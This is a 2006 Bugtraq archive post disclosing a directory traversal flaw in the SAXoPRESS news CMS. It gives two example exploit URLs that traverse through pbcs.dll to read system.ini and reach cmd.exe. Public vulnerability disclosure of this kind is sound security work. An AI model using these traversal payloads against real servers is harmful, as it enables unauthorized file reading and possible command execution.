Home page logo
/

bugtraq logo Bugtraq mailing list archives

SAXoPRESS - directory traversal
From: securiteam () datasec no
Date: 11 Apr 2006 15:37:16 -0000

SAXoPRESS is a content management system, mainly used for news publishing.

A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and 
possibly execute arbitrary commands.

Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe

Affected versions: unconfirmed


  By Date           By Thread  

Current thread:
  • SAXoPRESS - directory traversal securiteam (Apr 12)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]